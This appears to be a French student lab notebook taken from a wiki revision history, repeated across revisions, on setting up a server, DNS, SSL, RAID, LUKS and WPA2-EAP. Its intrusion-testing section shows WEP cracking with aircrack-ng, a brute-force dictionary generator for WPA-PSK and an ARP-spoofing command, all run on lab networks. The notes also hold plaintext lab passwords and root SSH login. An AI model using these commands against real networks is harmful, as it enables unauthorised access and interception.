=== Sécurisation WiFi par WPA2-EAP ===

==== Configuration borne wifi ====

wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3
wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3
wifi-ima5sc(config)# aaa group server radius radius_group3
wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813
wifi-ima5sc(config-server)#exit
wifi-ima5sc(config)# dot11 ssid SSID_GROUP3
wifi-ima5sc(config-ssid)# mbssid guest-mode
wifi-ima5sc(config-ssid)# vlan 303
wifi-ima5sc(config-ssid)# authentication open eap eap_group3
wifi-ima5sc(config-ssid)# authentication network-eap eap_group3
wifi-ima5sc(config-ssid)# authentication key-management wpa
wifi-ima5sc(config-ssid)#exit

wifi-ima5sc(config)# int Dot11Radio0
wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip
wifi-ima5sc(config-if)# mbssid
wifi-ima5sc(config-if)#exit
wifi-ima5sc(config)# ssid SSID_GROUP3

wifi-ima5sc(config)# int dot11radio0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit

wifi-ima5sc(config)# int Gi0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit
wifi-ima5sc(config)#exit
wifi-ima5sc# write

Nous avons configuré notre routeur wifi à l'aide de notre Vlan.

==== Installation freeRadius ====

Sudo apt install freeradius

dans le fichier
/etc/freeradius/3.0/users

Nous ajoutons une ligne dans le but d'ajouter un utilisateur
pifou Cleartext-Password := "pasglop"

Dans le fichier
/etc/freeradius/3.0/client.conf

Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.

client pra_wifi {
ipaddr = 10.60.100.10
secret = secret_group3 }

Dans le fichier
/etc/freeradius/3.0/mods-enabled/eap

On ajoute la ligne suivante afin de définir le protocole de communication
default_eap_type = peap

Et on peut lancer notre freeradius
freeradius -X

==== DHCP ====
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.

6509E
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

C9200
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

== Site Web ==

Achat de clavaire.site[https://www.clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

== Ferme de serveur ==

Ajout du bridge bridgeStudents sur la VM (fichier .cfg)

commande installation python :
ansible -i clavaire.ini -m raw -a "apt install python -y" all --user root --ask-pass

commande envoi clé ssh :
ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key="{{lookup("file","/root/.ssh/id_rsa.pub")}}"' --user root --ask-pass all

TP sysres IMA5sc 2020/2021 G3

2020-12-17T08:14:35Z

Tmertz : /* Ferme de serveur */

TP sysres IMA5sc 2020/2021 G3

2020-12-17T08:13:35Z

Tmertz : /* Site Web */

TP sysres IMA5sc 2020/2021 G3

2020-12-16T13:29:15Z

Tmertz : /* Installation freeRadius */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.186/28
URL : www.clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

Rename disque et formatage (lvrename/mkfs)

Modif .cfg pour ajouter disques

Transfert fichier /var vers nouvelle partition

Ajoute au /etc/fstab les disques

Mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Création du Vlan303 :

Routeur 6509-E

vlan 303
name clavaire303
exit
int vlan 303
no shut
ip address 100.64.0.1 255.255.255.0
exit
vlan 303
vrrp 54 ip 10.60.103.254
vrrp 54 preempt
vrrp 54 priority 110

Routeur C9200

vlan 333
name clavaire303
exit
int vlan 333
no shut
ip address 100.64.0.2 255.255.255.0
exit
vlan 303
vrrp 54 address-family ipv4
address 10.60.103.254
preempt
vrrpv2

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186
IN AAAA [ipv6]

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

=== Sécurisation site web par certificat ===

Dans un premier temps, nous avons créé un serveur apache2,

systemctl start apache2

Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.

Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.

mailx -f Maildir/

Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.

A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL

Nous devons ensuite activer nos certificats SSL

a2enmod ssl

Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.

Puis un petit restart et notre site est sécurisé.

=== Sécurisation de serveur DNS par DNSSEC ===

Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.

Nous avons vérifié le bon fonctionnement à l'aide de :

https://dnsviz.net/d/clavaire.site/dnssec/

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.

Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.

Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.

aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===

L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.

Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,

sysctl -w net.ipv4.ip_forward=1

Nous commencons ainsi le piratage,

attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186

=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Sécurisation de données ===

On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.
On peut créer le raid :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7
mkfs.ext4 /dev/md0

Pour qu'il soit monté a chaque démarrage de la vm :
mdadm --monitor --daemonise /dev/md0

Et on l'ajoute au fichier /etc/fstab

Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

=== Sécurisation WiFi par WPA2-EAP ===

==== Configuration borne wifi ====

wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3
wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3
wifi-ima5sc(config)# aaa group server radius radius_group3
wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813
wifi-ima5sc(config-server)#exit
wifi-ima5sc(config)# dot11 ssid SSID_GROUP3
wifi-ima5sc(config-ssid)# mbssid guest-mode
wifi-ima5sc(config-ssid)# vlan 303
wifi-ima5sc(config-ssid)# authentication open eap eap_group3
wifi-ima5sc(config-ssid)# authentication network-eap eap_group3
wifi-ima5sc(config-ssid)# authentication key-management wpa
wifi-ima5sc(config-ssid)#exit

wifi-ima5sc(config)# int Dot11Radio0
wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip
wifi-ima5sc(config-if)# mbssid
wifi-ima5sc(config-if)#exit
wifi-ima5sc(config)# ssid SSID_GROUP3

wifi-ima5sc(config)# int dot11radio0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit

wifi-ima5sc(config)# int Gi0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit
wifi-ima5sc(config)#exit
wifi-ima5sc# write

Nous avons configuré notre routeur wifi à l'aide de notre Vlan.

==== Installation freeRadius ====

Sudo apt install freeradius

dans le fichier
/etc/freeradius/3.0/users

Nous ajoutons une ligne dans le but d'ajouter un utilisateur
pifou Cleartext-Password := "pasglop"

Dans le fichier
/etc/freeradius/3.0/client.conf

Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.

client pra_wifi {
ipaddr = 10.60.100.10
secret = secret_group3 }

Dans le fichier
/etc/freeradius/3.0/mods-enabled/eap

On ajoute la ligne suivante afin de définir le protocole de communication
default_eap_type = peap

Et on peut lancer notre freeradius
freeradius -X

==== DHCP ====
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.

6509E
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.10
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.100 10.60.114.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

C9200
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.100
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.200 10.60.114.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

== Site Web ==

Achat de clavaire.site[https://www.clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-12-16T13:23:39Z

Tmertz : /* Routage du site IPv4 */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.186/28
URL : www.clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

Rename disque et formatage (lvrename/mkfs)

Modif .cfg pour ajouter disques

Transfert fichier /var vers nouvelle partition

Ajoute au /etc/fstab les disques

Mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Création du Vlan303 :

Routeur 6509-E

vlan 303
name clavaire303
exit
int vlan 303
no shut
ip address 100.64.0.1 255.255.255.0
exit
vlan 303
vrrp 54 ip 10.60.103.254
vrrp 54 preempt
vrrp 54 priority 110

Routeur C9200

vlan 333
name clavaire303
exit
int vlan 333
no shut
ip address 100.64.0.2 255.255.255.0
exit
vlan 303
vrrp 54 address-family ipv4
address 10.60.103.254
preempt
vrrpv2

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186
IN AAAA [ipv6]

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

=== Sécurisation site web par certificat ===

Dans un premier temps, nous avons créé un serveur apache2,

systemctl start apache2

Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.

Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.

mailx -f Maildir/

Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.

A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL

Nous devons ensuite activer nos certificats SSL

a2enmod ssl

Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.

Puis un petit restart et notre site est sécurisé.

=== Sécurisation de serveur DNS par DNSSEC ===

Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.

Nous avons vérifié le bon fonctionnement à l'aide de :

https://dnsviz.net/d/clavaire.site/dnssec/

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.

Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.

Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.

aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===

L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.

Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,

sysctl -w net.ipv4.ip_forward=1

Nous commencons ainsi le piratage,

attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186

=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Sécurisation de données ===

On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.
On peut créer le raid :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7
mkfs.ext4 /dev/md0

Pour qu'il soit monté a chaque démarrage de la vm :
mdadm --monitor --daemonise /dev/md0

Et on l'ajoute au fichier /etc/fstab

Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

=== Sécurisation WiFi par WPA2-EAP ===

==== Configuration borne wifi ====

wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3
wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3
wifi-ima5sc(config)# aaa group server radius radius_group3
wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813
wifi-ima5sc(config-server)#exit
wifi-ima5sc(config)# dot11 ssid SSID_GROUP3
wifi-ima5sc(config-ssid)# mbssid guest-mode
wifi-ima5sc(config-ssid)# vlan 303
wifi-ima5sc(config-ssid)# authentication open eap eap_group3
wifi-ima5sc(config-ssid)# authentication network-eap eap_group3
wifi-ima5sc(config-ssid)# authentication key-management wpa
wifi-ima5sc(config-ssid)#exit

wifi-ima5sc(config)# int Dot11Radio0
wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip
wifi-ima5sc(config-if)# mbssid
wifi-ima5sc(config-if)#exit
wifi-ima5sc(config)# ssid SSID_GROUP3

wifi-ima5sc(config)# int dot11radio0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit

wifi-ima5sc(config)# int Gi0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit
wifi-ima5sc(config)#exit
wifi-ima5sc# write

Nous avons configuré notre routeur wifi à l'aide de notre Vlan.

==== Installation freeRadius ====

Sudo apt install freeradius

dans le fichier
/etc/freeradius/3.0/users

Nous ajoutons une ligne dans le but d'ajouter un utilisateur
pifou Cleartext-Password := "pasglop"

Dans le fichier
/etc/freeradius/3.0/client.conf

Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.

client pra_wifi {
ipaddr = 10.60.100.10
secret = secret_group14 }

== Site Web ==

Achat de clavaire.site[https://www.clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-12-16T13:09:25Z

Tmertz : /* DNS */

TP sysres IMA5sc 2020/2021 G3

2020-12-16T13:08:05Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T17:27:52Z

Tmertz : /* Attaque de type "homme au milieu" par usurpation ARP */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T16:47:31Z

Tmertz : /* Attaque de type "homme au milieu" par usurpation ARP */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T16:40:55Z

Tmertz : /* Cassage de mot de passe WPA-PSK par force brute */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T16:31:35Z

Tmertz : /* Sécurisation de serveur DNS par DNSSEC */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T16:25:41Z

Tmertz : /* Sécurisation site web par certificat */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T16:01:07Z

Tmertz : /* Sécurisation site web par certificat */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T15:58:26Z

Tmertz : /* DNS */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T15:56:20Z

Tmertz : /* Sécurisation site web par certificat */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T15:35:52Z

Tmertz : /* Services Internet */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T15:34:00Z

Tmertz : /* Site Web */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T15:33:39Z

Tmertz : /* Sécurisation de données */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T15:32:52Z

Tmertz : /* Réalisations */

TP sysres IMA5sc 2020/2021 G3

2020-11-30T15:25:35Z

Tmertz : /* Informations générales */

TP sysres IMA5sc 2020/2021

2020-11-17T14:04:19Z

Tmertz : /* Plan d'adressage */

== Répartition des binômes ==

{| class="wikitable"
! Cahier !! Elèves
|-
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]
| GURY Evan & DUBOIS Vincent
|-
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]
| BARGIBANT Quentin & LAGNEAU Alex
|-
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]
| SIMONIN Richard & MERTZ Thomas
|-
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]
| BENAYED Samuel & EVRARD Théo
|-
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]
| RINGOT Loïc & SANCHEZ Pierre
|-
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]
| NDUWAMUNGU Jean De Dieu & MOINAT Théau
|-
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]
| EKHLAS EID Nour & BISALLI Clara
|-
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]
| SOULAIMANI Jawad & TEKIN Kadir
|-
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]
| VIEUBLED Tanguy & VERNIER Paul
|-
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]
| MALTI Hind & AHOUASSOU Loris
|-
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]
| DARDENNE Sébastien & CALLERISA Corto
|-
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]
| NORMAND Quentin & CLAUDEL Maxime
|-
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]
| FAUCHOIS Lukas & ROUILLÉ Guillaume
|}

==A faire==

Chaque binôme peut :
* '''Compléter les tableaux du plan d'adressage'''
* Ajouter ses routes sur les 2 routeurs
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV4 (adresse + vrrp)
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV6 (adresse)

Vous pouvez vous renseigner sur notre wiki.<br/>
Faites surtout très attention à ne pas effacer les modifications des autres groupes ainsi que les modifications communes déjà effectuées !

'''Il n'y a rien à modifier sur les vlan 1, 131, 301, 314 et 333 !'''<br/>
'''Il n'y a rien à faire au niveau du rip'''

Si vous avez le moindre doute, '''demandez-nous''' !

Cordialement,

Le groupe 14

==Plan d'adressage==

{| class="wikitable"
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique) !! IP (privée)
|-
| Groupe 14
| oronge.site
| Debian 10 Buster
| 314
| 193.48.57.176
| 100.64.0.16
|-
